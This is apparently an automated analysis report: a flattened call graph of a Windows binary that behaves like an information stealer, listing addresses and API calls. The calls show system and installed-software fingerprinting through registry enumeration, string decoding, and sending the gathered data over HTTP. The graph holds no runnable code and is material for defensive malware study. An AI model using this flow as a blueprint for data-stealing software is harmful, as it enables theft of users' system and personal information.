3ca9b0 4 API calls 14664->14665 14666 3b4a20 14665->14666 14667 3ca8a0 lstrcpy 14666->14667 14668 3b4a29 14667->14668 14669 3ca9b0 4 API calls 14668->14669 14670 3b4a48 14669->14670 14671 3ca8a0 lstrcpy 14670->14671 14672 3b4a51 14671->14672 14673 3ca9b0 4 API calls 14672->14673 14674 3b4a7d 14673->14674 14675 3ca920 3 API calls 14674->14675 14676 3b4a84 14675->14676 14677 3ca8a0 lstrcpy 14676->14677 14678 3b4a8d 14677->14678 14679 3b4aa3 InternetConnectA 14678->14679 14679->14635 14680 3b4ad3 HttpOpenRequestA 14679->14680 14682 3b4b28 14680->14682 14683 3b4ebe InternetCloseHandle 14680->14683 14684 3ca9b0 4 API calls 14682->14684 14683->14635 14685 3b4b3c 14684->14685 14686 3ca8a0 lstrcpy 14685->14686 14687 3b4b45 14686->14687 14688 3ca920 3 API calls 14687->14688 14689 3b4b63 14688->14689 14690 3ca8a0 lstrcpy 14689->14690 14691 3b4b6c 14690->14691 14692 3ca9b0 4 API calls 14691->14692 14693 3b4b8b 14692->14693 14694 3ca8a0 lstrcpy 14693->14694 14695 3b4b94 14694->14695 14696 3ca9b0 4 API calls 14695->14696 14697 3b4bb5 14696->14697 14698 3ca8a0 lstrcpy 14697->14698 14699 3b4bbe 14698->14699 14700 3ca9b0 4 API calls 14699->14700 14701 3b4bde 14700->14701 14702 3ca8a0 lstrcpy 14701->14702 14703 3b4be7 14702->14703 14704 3ca9b0 4 API calls 14703->14704 14705 3b4c06 14704->14705 14706 3ca8a0 lstrcpy 14705->14706 14707 3b4c0f 14706->14707 14708 3ca920 3 API calls 14707->14708 14709 3b4c2d 14708->14709 14710 3ca8a0 lstrcpy 14709->14710 14711 3b4c36 14710->14711 14712 3ca9b0 4 API calls 14711->14712 14713 3b4c55 14712->14713 14714 3ca8a0 lstrcpy 14713->14714 14715 3b4c5e 14714->14715 14716 3ca9b0 4 API calls 14715->14716 14717 3b4c7d 14716->14717 14718 3ca8a0 lstrcpy 14717->14718 14719 3b4c86 14718->14719 14720 3ca920 3 API calls 14719->14720 14721 3b4ca4 14720->14721 14722 3ca8a0 lstrcpy 14721->14722 14723 3b4cad 14722->14723 14724 3ca9b0 4 API calls 14723->14724 14725 3b4ccc 14724->14725 14726 3ca8a0 lstrcpy 14725->14726 14727 3b4cd5 14726->14727 14728 3ca9b0 4 API calls 14727->14728 14729 3b4cf6 14728->14729 14730 3ca8a0 lstrcpy 14729->14730 14731 3b4cff 14730->14731 14732 3ca9b0 4 API calls 14731->14732 14733 3b4d1f 14732->14733 14734 3ca8a0 lstrcpy 14733->14734 14735 3b4d28 14734->14735 14736 3ca9b0 4 API calls 14735->14736 14737 3b4d47 14736->14737 14738 3ca8a0 lstrcpy 14737->14738 14739 3b4d50 14738->14739 14740 3ca920 3 API calls 14739->14740 14741 3b4d6e 14740->14741 14742 3ca8a0 lstrcpy 14741->14742 14743 3b4d77 14742->14743 14744 3ca740 lstrcpy 14743->14744 14745 3b4d92 14744->14745 14746 3ca920 3 API calls 14745->14746 14747 3b4db3 14746->14747 14748 3ca920 3 API calls 14747->14748 14749 3b4dba 14748->14749 14750 3ca8a0 lstrcpy 14749->14750 14751 3b4dc6 14750->14751 14752 3b4de7 lstrlen 14751->14752 14753 3b4dfa 14752->14753 14754 3b4e03 lstrlen 14753->14754 15693 3caad0 14754->15693 14756 3b4e13 HttpSendRequestA 14757 3b4e32 InternetReadFile 14756->14757 14758 3b4e67 InternetCloseHandle 14757->14758 14763 3b4e5e 14757->14763 14761 3ca800 14758->14761 14760 3ca9b0 4 API calls 14760->14763 14761->14683 14762 3ca8a0 lstrcpy 14762->14763 14763->14757 14763->14758 14763->14760 14763->14762 15700 3caad0 14764->15700 14766 3c17c4 StrCmpCA 14767 3c17cf ExitProcess 14766->14767 14768 3c17d7 14766->14768 14769 3c19c2 14768->14769 14770 3c185d StrCmpCA 14768->14770 14771 3c187f StrCmpCA 14768->14771 14772 3c1970 StrCmpCA 14768->14772 14773 3c18f1 StrCmpCA 14768->14773 14774 3c1951 StrCmpCA 14768->14774 14775 3c1932 StrCmpCA 14768->14775 14776 3c1913 StrCmpCA 14768->14776 14777 3c18ad StrCmpCA 14768->14777 14778 3c18cf StrCmpCA 14768->14778 14779 3ca820 lstrlen lstrcpy 14768->14779 14769->13687 14770->14768 14771->14768 14772->14768 14773->14768 14774->14768 14775->14768 14776->14768 14777->14768 14778->14768 14779->14768 14781 3ca7a0 lstrcpy 14780->14781 14782 3b5979 14781->14782 14783 3b47b0 2 API calls 14782->14783 14784 3b5985 14783->14784 14785 3ca740 lstrcpy 14784->14785 14786 3b59ba 14785->14786 14787 3ca740 lstrcpy 14786->14787 14788 3b59c7 14787->14788 14789 3ca740 lstrcpy 14788->14789 14790 3b59d4 14789->14790 14791 3ca740 lstrcpy 14790->14791 14792 3b59e1 14791->14792 14793 3ca740 lstrcpy 14792->14793 14794 3b59ee InternetOpenA StrCmpCA 14793->14794 14795 3b5a1d 14794->14795 14796 3b5fc3 InternetCloseHandle 14795->14796 14797 3c8b60 3 API calls 14795->14797 14799 3b5fe0 14796->14799 14798 3b5a3c 14797->14798 14800 3ca920 3 API calls 14798->14800 14801 3b9ac0 4 API calls 14799->14801 14802 3b5a4f 14800->14802 14803 3b5fe6 14801->14803 14804 3ca8a0 lstrcpy 14802->14804 14805 3ca820 2 API calls 14803->14805 14807 3b601f codecvt 14803->14807 14809 3b5a58 14804->14809 14806 3b5ffd 14805->14806 14808 3ca9b0 4 API calls 14806->14808 14811 3ca7a0 lstrcpy 14807->14811 14810 3b6013 14808->14810 14813 3ca9b0 4 API calls 14809->14813 14812 3ca8a0 lstrcpy 14810->14812 14821 3b604f 14811->14821 14812->14807 14814 3b5a82 14813->14814 14815 3ca8a0 lstrcpy 14814->14815 14816 3b5a8b 14815->14816 14817 3ca9b0 4 API calls 14816->14817 14818 3b5aaa 14817->14818 14819 3ca8a0 lstrcpy 14818->14819 14820 3b5ab3 14819->14820 14822 3ca920 3 API calls 14820->14822 14821->13693 14823 3b5ad1 14822->14823 14824 3ca8a0 lstrcpy 14823->14824 14825 3b5ada 14824->14825 14826 3ca9b0 4 API calls 14825->14826 14827 3b5af9 14826->14827 14828 3ca8a0 lstrcpy 14827->14828 14829 3b5b02 14828->14829 14830 3ca9b0 4 API calls 14829->14830 14831 3b5b21 14830->14831 14832 3ca8a0 lstrcpy 14831->14832 14833 3b5b2a 14832->14833 14834 3ca9b0 4 API calls 14833->14834 14835 3b5b56 14834->14835 14836 3ca920 3 API calls 14835->14836 14837 3b5b5d 14836->14837 14838 3ca8a0 lstrcpy 14837->14838 14839 3b5b66 14838->14839 14840 3b5b7c InternetConnectA 14839->14840 14840->14796 14841 3b5bac HttpOpenRequestA 14840->14841 14843 3b5c0b 14841->14843 14844 3b5fb6 InternetCloseHandle 14841->14844 14845 3ca9b0 4 API calls 14843->14845 14844->14796 14846 3b5c1f 14845->14846 14847 3ca8a0 lstrcpy 14846->14847 14848 3b5c28 14847->14848 14849 3ca920 3 API calls 14848->14849 14850 3b5c46 14849->14850 14851 3ca8a0 lstrcpy 14850->14851 14852 3b5c4f 14851->14852 14853 3ca9b0 4 API calls 14852->14853 14854 3b5c6e 14853->14854 14855 3ca8a0 lstrcpy 14854->14855 14856 3b5c77 14855->14856 14857 3ca9b0 4 API calls 14856->14857 14858 3b5c98 14857->14858 14859 3ca8a0 lstrcpy 14858->14859 14860 3b5ca1 14859->14860 14861 3ca9b0 4 API calls 14860->14861 14862 3b5cc1 14861->14862 14863 3ca8a0 lstrcpy 14862->14863 14864 3b5cca 14863->14864 14865 3ca9b0 4 API calls 14864->14865 14866 3b5ce9 14865->14866 14867 3ca8a0 lstrcpy 14866->14867 14868 3b5cf2 14867->14868 14869 3ca920 3 API calls 14868->14869 14870 3b5d10 14869->14870 14871 3ca8a0 lstrcpy 14870->14871 14872 3b5d19 14871->14872 14873 3ca9b0 4 API calls 14872->14873 14874 3b5d38 14873->14874 14875 3ca8a0 lstrcpy 14874->14875 14876 3b5d41 14875->14876 14877 3ca9b0 4 API calls 14876->14877 14878 3b5d60 14877->14878 14879 3ca8a0 lstrcpy 14878->14879 14880 3b5d69 14879->14880 14881 3ca920 3 API calls 14880->14881 14882 3b5d87 14881->14882 14883 3ca8a0 lstrcpy 14882->14883 14884 3b5d90 14883->14884 14885 3ca9b0 4 API calls 14884->14885 14886 3b5daf 14885->14886 14887 3ca8a0 lstrcpy 14886->14887 14888 3b5db8 14887->14888 14889 3ca9b0 4 API calls 14888->14889 14890 3b5dd9 14889->14890 14891 3ca8a0 lstrcpy 14890->14891 14892 3b5de2 14891->14892 14893 3ca9b0 4 API calls 14892->14893 14894 3b5e02 14893->14894 14895 3ca8a0 lstrcpy 14894->14895 14896 3b5e0b 14895->14896 14897 3ca9b0 4 API calls 14896->14897 14898 3b5e2a 14897->14898 14899 3ca8a0 lstrcpy 14898->14899 14900 3b5e33 14899->14900 14901 3ca920 3 API calls 14900->14901 14902 3b5e54 14901->14902 14903 3ca8a0 lstrcpy 14902->14903 14904 3b5e5d 14903->14904 14905 3b5e70 lstrlen 14904->14905 15701 3caad0 14905->15701 14907 3b5e81 lstrlen GetProcessHeap RtlAllocateHeap 15702 3caad0 14907->15702 14909 3b5eae lstrlen 14910 3b5ebe 14909->14910 14911 3b5ed7 lstrlen 14910->14911 14912 3b5ee7 14911->14912 14913 3b5ef0 lstrlen 14912->14913 14914 3b5f04 14913->14914 14915 3b5f1a lstrlen 14914->14915 15703 3caad0 14915->15703 14917 3b5f2a HttpSendRequestA 14918 3b5f35 InternetReadFile 14917->14918 14919 3b5f6a InternetCloseHandle 14918->14919 14923 3b5f61 14918->14923 14919->14844 14921 3ca9b0 4 API calls 14921->14923 14922 3ca8a0 lstrcpy 14922->14923 14923->14918 14923->14919 14923->14921 14923->14922 14926 3c1077 14924->14926 14925 3c1151 14925->13695 14926->14925 14927 3ca820 lstrlen lstrcpy 14926->14927 14927->14926 14930 3c0db7 14928->14930 14929 3c0f17 14929->13703 14930->14929 14931 3c0ea4 StrCmpCA 14930->14931 14932 3c0e27 StrCmpCA 14930->14932 14933 3c0e67 StrCmpCA 14930->14933 14934 3ca820 lstrlen lstrcpy 14930->14934 14931->14930 14932->14930 14933->14930 14934->14930 14936 3c0f67 14935->14936 14937 3c0fb2 StrCmpCA 14936->14937 14938 3c1044 14936->14938 14939 3ca820 lstrlen lstrcpy 14936->14939 14937->14936 14938->13711 14939->14936 14941 3ca740 lstrcpy 14940->14941 14942 3c1a26 14941->14942 14943 3ca9b0 4 API calls 14942->14943 14944 3c1a37 14943->14944 14945 3ca8a0 lstrcpy 14944->14945 14946 3c1a40 14945->14946 14947 3ca9b0 4 API calls 14946->14947 14948 3c1a5b 14947->14948 14949 3ca8a0 lstrcpy 14948->14949 14950 3c1a64 14949->14950 14951 3ca9b0 4 API calls 14950->14951 14952 3c1a7d 14951->14952 14953 3ca8a0 lstrcpy 14952->14953 14954 3c1a86 14953->14954 14955 3ca9b0 4 API calls 14954->14955 14956 3c1aa1 14955->14956 14957 3ca8a0 lstrcpy 14956->14957 14958 3c1aaa 14957->14958 14959 3ca9b0 4 API calls 14958->14959 14960 3c1ac3 14959->14960 14961 3ca8a0 lstrcpy 14960->14961 14962 3c1acc 14961->14962 14963 3ca9b0 4 API calls 14962->14963 14964 3c1ae7 14963->14964 14965 3ca8a0 lstrcpy 14964->14965 14966 3c1af0 14965->14966 14967 3ca9b0 4 API calls 14966->14967 14968 3c1b09 14967->14968 14969 3ca8a0 lstrcpy 14968->14969 14970 3c1b12 14969->14970 14971 3ca9b0 4 API calls 14970->14971 14972 3c1b2d 14971->14972 14973 3ca8a0 lstrcpy 14972->14973 14974 3c1b36 14973->14974 14975 3ca9b0 4 API calls 14974->14975 14976 3c1b4f 14975->14976 14977 3ca8a0 lstrcpy 14976->14977 14978 3c1b58 14977->14978 14979 3ca9b0 4 API calls 14978->14979 14980 3c1b76 14979->14980 14981 3ca8a0 lstrcpy 14980->14981 14982 3c1b7f 14981->14982 14983 3c7500 6 API calls 14982->14983 14984 3c1b96 14983->14984 14985 3ca920 3 API calls 14984->14985 14986 3c1ba9 14985->14986 14987 3ca8a0 lstrcpy 14986->14987 14988 3c1bb2 14987->14988 14989 3ca9b0 4 API calls 14988->14989 14990 3c1bdc 14989->14990 14991 3ca8a0 lstrcpy 14990->14991 14992 3c1be5 14991->14992 14993 3ca9b0 4 API calls 14992->14993 14994 3c1c05 14993->14994 14995 3ca8a0 lstrcpy 14994->14995 14996 3c1c0e 14995->14996 15704 3c7690 GetProcessHeap RtlAllocateHeap 14996->15704 14999 3ca9b0 4 API calls 15000 3c1c2e 14999->15000 15001 3ca8a0 lstrcpy 15000->15001 15002 3c1c37 15001->15002 15003 3ca9b0 4 API calls 15002->15003 15004 3c1c56 15003->15004 15005 3ca8a0 lstrcpy 15004->15005 15006 3c1c5f 15005->15006 15007 3ca9b0 4 API calls 15006->15007 15008 3c1c80 15007->15008 15009 3ca8a0 lstrcpy 15008->15009 15010 3c1c89 15009->15010 15711 3c77c0 GetCurrentProcess IsWow64Process 15010->15711 15013 3ca9b0 4 API calls 15014 3c1ca9 15013->15014 15015 3ca8a0 lstrcpy 15014->15015 15016 3c1cb2 15015->15016 15017 3ca9b0 4 API calls 15016->15017 15018 3c1cd1 15017->15018 15019 3ca8a0 lstrcpy 15018->15019 15020 3c1cda 15019->15020 15021 3ca9b0 4 API calls 15020->15021 15022 3c1cfb 15021->15022 15023 3ca8a0 lstrcpy 15022->15023 15024 3c1d04 15023->15024 15025 3c7850 3 API calls 15024->15025 15026 3c1d14 15025->15026 15027 3ca9b0 4 API calls 15026->15027 15028 3c1d24 15027->15028 15029 3ca8a0 lstrcpy 15028->15029 15030 3c1d2d 15029->15030 15031 3ca9b0 4 API calls 15030->15031 15032 3c1d4c 15031->15032 15033 3ca8a0 lstrcpy 15032->15033 15034 3c1d55 15033->15034 15035 3ca9b0 4 API calls 15034->15035 15036 3c1d75 15035->15036 15037 3ca8a0 lstrcpy 15036->15037 15038 3c1d7e 15037->15038 15039 3c78e0 3 API calls 15038->15039 15040 3c1d8e 15039->15040 15041 3ca9b0 4 API calls 15040->15041 15042 3c1d9e 15041->15042 15043 3ca8a0 lstrcpy 15042->15043 15044 3c1da7 15043->15044 15045 3ca9b0 4 API calls 15044->15045 15046 3c1dc6 15045->15046 15047 3ca8a0 lstrcpy 15046->15047 15048 3c1dcf 15047->15048 15049 3ca9b0 4 API calls 15048->15049 15050 3c1df0 15049->15050 15051 3ca8a0 lstrcpy 15050->15051 15052 3c1df9 15051->15052 15713 3c7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15052->15713 15055 3ca9b0 4 API calls 15056 3c1e19 15055->15056 15057 3ca8a0 lstrcpy 15056->15057 15058 3c1e22 15057->15058 15059 3ca9b0 4 API calls 15058->15059 15060 3c1e41 15059->15060 15061 3ca8a0 lstrcpy 15060->15061 15062 3c1e4a 15061->15062 15063 3ca9b0 4 API calls 15062->15063 15064 3c1e6b 15063->15064 15065 3ca8a0 lstrcpy 15064->15065 15066 3c1e74 15065->15066 15715 3c7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15066->15715 15069 3ca9b0 4 API calls 15070 3c1e94 15069->15070 15071 3ca8a0 lstrcpy 15070->15071 15072 3c1e9d 15071->15072 15073 3ca9b0 4 API calls 15072->15073 15074 3c1ebc 15073->15074 15075 3ca8a0 lstrcpy 15074->15075 15076 3c1ec5 15075->15076 15077 3ca9b0 4 API calls 15076->15077 15078 3c1ee5 15077->15078 15079 3ca8a0 lstrcpy 15078->15079 15080 3c1eee 15079->15080 15718 3c7b00 GetUserDefaultLocaleName 15080->15718 15083 3ca9b0 4 API calls 15084 3c1f0e 15083->15084 15085 3ca8a0 lstrcpy 15084->15085 15086 3c1f17 15085->15086 15087 3ca9b0 4 API calls 15086->15087 15088 3c1f36 15087->15088 15089 3ca8a0 lstrcpy 15088->15089 15090 3c1f3f 15089->15090 15091 3ca9b0 4 API calls 15090->15091 15092 3c1f60 15091->15092 15093 3ca8a0 lstrcpy 15092->15093 15094 3c1f69 15093->15094 15722 3c7b90 15094->15722 15096 3c1f80 15097 3ca920 3 API calls 15096->15097 15098 3c1f93 15097->15098 15099 3ca8a0 lstrcpy 15098->15099 15100 3c1f9c 15099->15100 15101 3ca9b0 4 API calls 15100->15101 15102 3c1fc6 15101->15102 15103 3ca8a0 lstrcpy 15102->15103 15104 3c1fcf 15103->15104 15105 3ca9b0 4 API calls 15104->15105 15106 3c1fef 15105->15106 15107 3ca8a0 lstrcpy 15106->15107 15108 3c1ff8 15107->15108 15734 3c7d80 GetSystemPowerStatus 15108->15734 15111 3ca9b0 4 API calls 15112 3c2018 15111->15112 15113 3ca8a0 lstrcpy 15112->15113 15114 3c2021 15113->15114 15115 3ca9b0 4 API calls 15114->15115 15116 3c2040 15115->15116 15117 3ca8a0 lstrcpy 15116->15117 15118 3c2049 15117->15118 15119 3ca9b0 4 API calls 15118->15119 15120 3c206a 15119->15120 15121 3ca8a0 lstrcpy 15120->15121 15122 3c2073 15121->15122 15123 3c207e GetCurrentProcessId 15122->15123 15736 3c9470 OpenProcess 15123->15736 15126 3ca920 3 API calls 15127 3c20a4 15126->15127 15128 3ca8a0 lstrcpy 15127->15128 15129 3c20ad 15128->15129 15130 3ca9b0 4 API calls 15129->15130 15131 3c20d7 15130->15131 15132 3ca8a0 lstrcpy 15131->15132 15133 3c20e0 15132->15133 15134 3ca9b0 4 API calls 15133->15134 15135 3c2100 15134->15135 15136 3ca8a0 lstrcpy 15135->15136 15137 3c2109 15136->15137 15741 3c7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15137->15741 15140 3ca9b0 4 API calls 15141 3c2129 15140->15141 15142 3ca8a0 lstrcpy 15141->15142 15143 3c2132 15142->15143 15144 3ca9b0 4 API calls 15143->15144 15145 3c2151 15144->15145 15146 3ca8a0 lstrcpy 15145->15146 15147 3c215a 15146->15147 15148 3ca9b0 4 API calls 15147->15148 15149 3c217b 15148->15149 15150 3ca8a0 lstrcpy 15149->15150 15151 3c2184 15150->15151 15745 3c7f60 15151->15745 15154 3ca9b0 4 API calls 15155 3c21a4 15154->15155 15156 3ca8a0 lstrcpy 15155->15156 15157 3c21ad 15156->15157 15158 3ca9b0 4 API calls 15157->15158 15159 3c21cc 15158->15159 15160 3ca8a0 lstrcpy 15159->15160 15161 3c21d5 15160->15161 15162 3ca9b0 4 API calls 15161->15162 15163 3c21f6 15162->15163 15164 3ca8a0 lstrcpy 15163->15164 15165 3c21ff 15164->15165 15758 3c7ed0 GetSystemInfo wsprintfA 15165->15758 15168 3ca9b0 4 API calls 15169 3c221f 15168->15169 15170 3ca8a0 lstrcpy 15169->15170 15171 3c2228 15170->15171 15172 3ca9b0 4 API calls 15171->15172 15173 3c2247 15172->15173 15174 3ca8a0 lstrcpy 15173->15174 15175 3c2250 15174->15175 15176 3ca9b0 4 API calls 15175->15176 15177 3c2270 15176->15177 15178 3ca8a0 lstrcpy 15177->15178 15179 3c2279 15178->15179 15760 3c8100 GetProcessHeap RtlAllocateHeap 15179->15760 15182 3ca9b0 4 API calls 15183 3c2299 15182->15183 15184 3ca8a0 lstrcpy 15183->15184 15185 3c22a2 15184->15185 15186 3ca9b0 4 API calls 15185->15186 15187 3c22c1 15186->15187 15188 3ca8a0 lstrcpy 15187->15188 15189 3c22ca 15188->15189 15190 3ca9b0 4 API calls 15189->15190 15191 3c22eb 15190->15191 15192 3ca8a0 lstrcpy 15191->15192 15193 3c22f4 15192->15193 15766 3c87c0 15193->15766 15196 3ca920 3 API calls 15197 3c231e 15196->15197 15198 3ca8a0 lstrcpy 15197->15198 15199 3c2327 15198->15199 15200 3ca9b0 4 API calls 15199->15200 15201 3c2351 15200->15201 15202 3ca8a0 lstrcpy 15201->15202 15203 3c235a 15202->15203 15204 3ca9b0 4 API calls 15203->15204 15205 3c237a 15204->15205 15206 3ca8a0 lstrcpy 15205->15206 15207 3c2383 15206->15207 15208 3ca9b0 4 API calls 15207->15208 15209 3c23a2 15208->15209 15210 3ca8a0 lstrcpy 15209->15210 15211 3c23ab 15210->15211 15771 3c81f0 15211->15771 15213 3c23c2 15214 3ca920 3 API calls 15213->15214 15215 3c23d5 15214->15215 15216 3ca8a0 lstrcpy 15215->15216 15217 3c23de 15216->15217 15218 3ca9b0 4 API calls 15217->15218 15219 3c240a 15218->15219 15220 3ca8a0 lstrcpy 15219->15220 15221 3c2413 15220->15221 15222 3ca9b0 4 API calls 15221->15222 15223 3c2432 15222->15223 15224 3ca8a0 lstrcpy 15223->15224 15225 3c243b 15224->15225 15226 3ca9b0 4 API calls 15225->15226 15227 3c245c 15226->15227 15228 3ca8a0 lstrcpy 15227->15228 15229 3c2465 15228->15229 15230 3ca9b0 4 API calls 15229->15230 15231 3c2484 15230->15231 15232 3ca8a0 lstrcpy 15231->15232 15233 3c248d 15232->15233 15234 3ca9b0 4 API calls 15233->15234 15235 3c24ae 15234->15235 15236 3ca8a0 lstrcpy 15235->15236 15237 3c24b7 15236->15237 15779 3c8320 15237->15779 15239 3c24d3 15240 3ca920 3 API calls 15239->15240 15241 3c24e6 15240->15241 15242 3ca8a0 lstrcpy 15241->15242 15243 3c24ef 15242->15243 15244 3ca9b0 4 API calls 15243->15244 15245 3c2519 15244->15245 15246 3ca8a0 lstrcpy 15245->15246 15247 3c2522 15246->15247 15248 3ca9b0 4 API calls 15247->15248 15249 3c2543 15248->15249 15250 3ca8a0 lstrcpy 15249->15250 15251 3c254c 15250->15251 15252 3c8320 17 API calls 15251->15252 15253 3c2568 15252->15253 15254 3ca920 3 API calls 15253->15254 15255 3c257b 15254->15255 15256 3ca8a0 lstrcpy 15255->15256 15257 3c2584 15256->15257 15258 3ca9b0 4 API calls 15257->15258 15259 3c25ae 15258->15259 15260 3ca8a0 lstrcpy 15259->15260 15261 3c25b7 15260->15261 15262 3ca9b0 4 API calls 15261->15262 15263 3c25d6 15262->15263 15264 3ca8a0 lstrcpy 15263->15264 15265 3c25df 15264->15265 15266 3ca9b0 4 API calls 15265->15266 15267 3c2600 15266->15267 15268 3ca8a0 lstrcpy 15267->15268 15269 3c2609 15268->15269 15815 3c8680 15269->15815 15271 3c2620 15272 3ca920 3 API calls 15271->15272 15273 3c2633 15272->15273 15274 3ca8a0 lstrcpy 15273->15274 15275 3c263c 15274->15275 15276 3c265a lstrlen 15275->15276 15277 3c266a 15276->15277 15278 3ca740 lstrcpy 15277->15278 15279 3c267c 15278->15279 15280 3b1590 lstrcpy 15279->15280 15281 3c268d 15280->15281 15825 3c5190 15281->15825 15283 3c2699 15283->13715 16013 3caad0 15284->16013 15286 3b5009 InternetOpenUrlA 15287 3b5021 15286->15287 15288 3b502a InternetReadFile 15287->15288 15289 3b50a0 InternetCloseHandle InternetCloseHandle 15287->15289 15288->15287 15290 3b50ec 15289->15290 15290->13719 16014 3b98d0 15291->16014 15293 3c0759 15294 3c077d 15293->15294 15295 3c0a38 15293->15295 15297 3c0799 StrCmpCA 15294->15297 15296 3b1590 lstrcpy 15295->15296 15298 3c0a49 15296->15298 15300 3c07a8 15297->15300 15301 3c0843 15297->15301 16190 3c0250 15298->16190 15303 3ca7a0 lstrcpy 15300->15303 15304 3c0865 StrCmpCA 15301->15304 15305 3c07c3 15303->15305 15306 3c0874 15304->15306 15343 3c096b 15304->15343 15307 3b1590 lstrcpy 15305->15307 15308 3ca740 lstrcpy 15306->15308 15309 3c080c 15307->15309 15311 3c0881 15308->15311 15312 3ca7a0 lstrcpy 15309->15312 15310 3c099c StrCmpCA 15313 3c09ab 15310->15313 15332 3c0a2d 15310->15332 15314 3ca9b0 4 API calls 15311->15314 15315 3c0823 15312->15315 15316 3b1590 lstrcpy 15313->15316 15317 3c08ac 15314->15317 15318 3ca7a0 lstrcpy 15315->15318 15319 3c09f4 15316->15319 15320 3ca920 3 API calls 15317->15320 15321 3c083e 15318->15321 15322 3ca7a0 lstrcpy 15319->15322 15323 3c08b3 15320->15323 16017 3bfb00 15321->16017 15325 3c0a0d 15322->15325 15326 3ca9b0 4 API calls 15323->15326 15327 3ca7a0 lstrcpy 15325->15327 15328 3c08ba 15326->15328 15329 3c0a28 15327->15329 15330 3ca8a0 lstrcpy 15328->15330 16133 3c0030 15329->16133 15332->13723 15343->15310 15665 3ca7a0 lstrcpy 15664->15665 15666 3b1683 15665->15666 15667 3ca7a0 lstrcpy 15666->15667 15668 3b1695 15667->15668 15669 3ca7a0 lstrcpy 15668->15669 15670 3b16a7 15669->15670 15671 3ca7a0 lstrcpy 15670->15671 15672 3b15a3 15671->15672 15672->14546 15674 3b47c6 15673->15674 15675 3b4838 lstrlen 15674->15675 15699 3caad0 15675->15699 15677 3b4848 InternetCrackUrlA 15678 3b4867 15677->15678 15678->14623 15680 3ca740 lstrcpy 15679->15680 15681 3c8b74 15680->15681 15682 3ca740 lstrcpy 15681->15682 15683 3c8b82 GetSystemTime 15682->15683 15685 3c8b99 15683->15685 15684 3ca7a0 lstrcpy 15686 3c8bfc 15684->15686 15685->15684 15686->14638 15688 3ca931 15687->15688 15689 3ca988 15688->15689 15691 3ca968 lstrcpy lstrcat 15688->15691 15690 3ca7a0 lstrcpy 15689->15690 15692 3ca994 15690->15692 15691->15689 15692->14641 15693->14756 15695 3b4eee 15694->15695 15696 3b9af9 LocalAlloc 15694->15696 15695->14644 15695->14646 15696->15695 15697 3b9b14 CryptStringToBinaryA 15696->15697 15697->15695 15698 3b9b39 LocalFree 15697->15698 15698->15695 15699->15677 15700->14766 15701->14907 15702->14909 15703->14917 15832 3c77a0 15704->15832 15707 3c1c1e 15707->14999 15708 3c76c6 RegOpenKeyExA 15709 3c7704 RegCloseKey 15708->15709 15710 3c76e7 RegQueryValueExA 15708->15710 15709->15707 15710->15709 15712 3c1c99 15711->15712 15712->15013 15714 3c1e09 15713->15714 15714->15055 15716 3c7a9a wsprintfA 15715->15716 15717 3c1e84 15715->15717 15716->15717 15717->15069 15719 3c7b4d 15718->15719 15720 3c1efe 15718->15720 15839 3c8d20 LocalAlloc CharToOemW 15719->15839 15720->15083 15723 3ca740 lstrcpy 15722->15723 15724 3c7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15723->15724 15733 3c7c25 15724->15733 15725 3c7d18 15727 3c7d1e LocalFree 15725->15727 15728 3c7d28 15725->15728 15726 3c7c46 GetLocaleInfoA 15726->15733 15727->15728 15729 3ca7a0 lstrcpy 15728->15729 15732 3c7d37 15729->15732 15730 3ca9b0 lstrcpy lstrlen lstrcpy lstrcat 15730->15733 15731 3ca8a0 lstrcpy 15731->15733 15732->15096 15733->15725 15733->15726 15733->15730 15733->15731 15735 3c2008 15734->15735 15735->15111 15737 3c94b5 15736->15737 15738 3c9493 GetModuleFileNameExA CloseHandle 15736->15738 15739 3ca740 lstrcpy 15737->15739 15738->15737 15740 3c2091 15739->15740 15740->15126 15742 3c7e68 RegQueryValueExA 15741->15742 15743 3c2119 15741->15743 15744 3c7e8e RegCloseKey 15742->15744 15743->15140 15744->15743 15746 3c7fb9 GetLogicalProcessorInformationEx 15745->15746 15747 3c7fd8 GetLastError 15746->15747 15753 3c8029 15746->15753 15750 3c8022 15747->15750 15755 3c7fe3 15747->15755 15749 3c2194 15749->15154 15750->15749 15752 3c89f0 2 API calls 15750->15752 15752->15749 15754 3c89f0 2 API calls 15753->15754 15756 3c807b 15754->15756 15755->15746 15755->15749 15840 3c89f0 15755->15840 15843 3c8a10 GetProcessHeap RtlAllocateHeap 15755->15843 15756->15750 15757 3c8084 wsprintfA 15756->15757 15757->15749 15759 3c220f 15758->15759 15759->15168 15761 3c89b0 15760->15761 15762 3c814d GlobalMemoryStatusEx 15761->15762 15763 3c8163 __aulldiv 15762->15763 15764 3c819b wsprintfA 15763->15764 15765 3c2289 15764->15765 15765->15182 15767 3c87fb GetProcessHeap RtlAllocateHeap wsprintfA 15766->15767 15769 3ca740 lstrcpy 15767->15769 15770 3c230b 15769->15770 15770->15196 15772 3ca740 lstrcpy 15771->15772 15773 3c8229 15772->15773 15774 3c8263 15773->15774 15776 3ca9b0 lstrcpy lstrlen lstrcpy lstrcat 15773->15776 15778 3ca8a0 lstrcpy 15773->15778 15775 3ca7a0 lstrcpy 15774->15775 15777 3c82dc 15775->15777 15776->15773 15777->15213 15778->15773 15780 3ca740 lstrcpy 15779->15780 15781 3c835c RegOpenKeyExA 15780->15781 15782 3c83ae 15781->15782 15783 3c83d0 15781->15783 15784 3ca7a0 lstrcpy 15782->15784 15785 3c83f8 RegEnumKeyExA 15783->15785 15786 3c8613 RegCloseKey 15783->15786 15787 3c83bd 15784->15787 15788 3c860e 15785->15788 15789 3c843f wsprintfA RegOpenKeyExA 15785->15789 15790 3ca7a0 lstrcpy 15786->15790 15787->15239 15788->15786 15791 3c8485 RegCloseKey RegCloseKey 15789->15791 15792 3c84c1 RegQueryValueExA 15789->15792 15790->15787 15793 3ca7a0 lstrcpy 15791->15793 15794 3c84fa lstrlen 15792->15794 15795 3c8601 RegCloseKey 15792->15795 15793->15787 15794->15795 15796 3c8510 15794->15796 15795->15788 15797 3ca9b0 4 API calls 15796->15797 15798 3c8527 15797->15798 15799 3ca8a0 lstrcpy 15798->15799 15800 3c8533 15799->15800 15801 3ca9b0 4 API calls 15800->15801 15802 3c8557 15801->15802 15803 3ca8a0 lstrcpy 15802->15803 15804 3c8563 15803->15804 15805 3c856e RegQueryValueExA 15804->15805 15805->15795 15806 3c85a3 15805->15806 15807 3ca9b0 4 API calls 15806->15807 15808 3c85ba 15807->15808 15809 3ca8a0 lstrcpy 15808->15809 